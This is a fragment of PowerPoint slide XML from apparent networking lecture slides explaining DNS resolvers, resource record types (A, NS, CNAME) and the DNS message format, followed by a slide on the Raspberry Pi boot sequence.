          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Adapted from course noes by Jennifer Rexford</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="119555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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="391440" y="1750657"/>
            <a:ext cx="11582400" cy="4788256"/>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Local DNS server (“default name server”) on LAN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Usually near the end hosts who use it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Local hosts configured with local server (e.g., /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>etc</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resolv.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) or learn the server via DHCP</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Client application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Extracts server name (e.g., from the URL)</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Do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>gethostbyname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="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to trigger resolver code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Server application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Extract client IP address from socket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Optional </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>gethostbyaddr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="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to translate into name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Note: Client often caches these values.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">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47</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148653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 data</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48</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
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B961BF74-BB50-8C44-8387-EC7CB18F230E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="678873" y="1502428"/>
            <a:ext cx="9535886" cy="5143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u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DNS:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> distributed database storing resource records </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(RR)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DA451E9-EF90-6F4C-88BA-C25AFC5A1629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="461963" y="4268647"/>
            <a:ext cx="4346575" cy="22225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Helvetica Light"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Helvetica Light"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Helvetica Light"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200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Type=NS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> is domain (e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>foo.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> is hostname of authoritative name server for this domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74939938-CB9D-2542-97B6-8C2ED24BE755}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1795463" y="2255697"/>
            <a:ext cx="5364162" cy="571500"/>
            <a:chOff x="1407" y="1206"/>
            <a:chExt cx="3379" cy="360"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Text Box 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BBC05D7-7951-0F45-8FCB-911AAEE469B0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1407" y="1214"/>
              <a:ext cx="337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sz="2400" b="0" dirty="0">
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>RR format: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>(name, value, type, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>ttl</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Rectangle 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9EF92E0-44B1-434F-9185-665395F00996}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1458" y="1206"/>
              <a:ext cx="3318" cy="36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b="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B3BF04C-FF80-324E-8110-1FF67B16D430}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="523875" y="3017697"/>
            <a:ext cx="38100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lgn="l" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:defRPr sz="24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itchFamily="2" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="20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itchFamily="2" charset="2"/>
              <a:buChar char=""/>
              <a:defRPr>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a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1597025" indent="-223838" algn="l" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="20542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6pPr>
            <a:lvl7pPr marL="25114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7pPr>
            <a:lvl8pPr marL="29686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8pPr>
            <a:lvl9pPr marL="34258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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="0" dirty="0"/>
              <a:t>Type=A</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="0" dirty="0"/>
              <a:t> is hostname</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="0" dirty="0"/>
              <a:t> is IP address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90540E12-9083-6B44-9E08-521D5823EEBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6712673" y="3057385"/>
            <a:ext cx="45148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lgn="l" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:defRPr sz="24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itchFamily="2" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="20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itchFamily="2" charset="2"/>
              <a:buChar char=""/>
              <a:defRPr>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a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1597025" indent="-223838" algn="l" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="20542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6pPr>
            <a:lvl7pPr marL="25114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7pPr>
            <a:lvl8pPr marL="29686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8pPr>
            <a:lvl9pPr marL="34258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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="0" dirty="0"/>
              <a:t>Type=CNAME</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="0" dirty="0"/>
              <a:t> is alias name for some “canonical” (the real) name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Helvetica" pitchFamily="2" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="0" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="0" dirty="0" err="1"/>
              <a:t>www.ibm.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="0" dirty="0"/>
              <a:t> is really</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Helvetica" pitchFamily="2" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="0" dirty="0"/>
              <a:t>  servereast.backup2.ibm.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="0" dirty="0"/>
              <a:t> is canonical name</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2661940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 message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49</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
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25885717-9D8B-E745-8969-FC52A1BC1F2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="542924" y="1169987"/>
            <a:ext cx="10180494" cy="68738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u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DNS protocol :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>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and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>reply</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> messages, both with same </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>message format</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A1EE303-52FA-D248-8E63-F25EA21D8245}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="2352675"/>
            <a:ext cx="35750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lgn="l" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:defRPr sz="24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itchFamily="2" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="20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itchFamily="2" charset="2"/>
              <a:buChar char=""/>
              <a:defRPr>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a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1597025" indent="-223838" algn="l" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="20542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6pPr>
            <a:lvl7pPr marL="25114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7pPr>
            <a:lvl8pPr marL="29686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8pPr>
            <a:lvl9pPr marL="34258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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="0" dirty="0"/>
              <a:t>Message header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Identification:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="0" dirty="0"/>
              <a:t> 16 bit # for query, reply to query uses same #</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Flags:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="0" dirty="0"/>
              <a:t>Query or reply</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="0" dirty="0"/>
              <a:t>Recursion desired </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="0" dirty="0"/>
              <a:t>Recursion available</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="0" dirty="0"/>
              <a:t>Reply is authoritative</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 5" descr="DNSmessage">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{988EAC6D-619B-5944-9377-651CF8AED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792" y="2035752"/>
            <a:ext cx="5132388" cy="4167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62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0312"/>
            <a:ext cx="11756020" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Booting an IoT device (Raspberry Pi) </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1932971"/>
            <a:ext cx="11582400" cy="4423379"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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The flow of boot begins with reading the OTP to decide which boot modes are enabled. By default, this is SD card boot followed by USB device boot.  OTP is proprietary code from Broadcom.  Among other things, this conditions SDRAM.</a:t>
            </a:r>
          </a:p>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Subsequently, the boot ROM checks to see if the GPIO boot mode OTP bits have been programmed — one to enable GPIO boot mode and one to select the bank of GPIOs it uses to disable boot modes (low = GPIOs 22-26, high = GPIOs 39-43).</a:t>
            </a:r>
          </a:p>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The CPU starts executing the first stage bootloader, which is stored in ROM on the SoC. The first stage bootloader reads the SD card, and loads the second stage bootloader (bootcode.bin) into the L2 cache, and runs it.</a:t>
            </a:r>
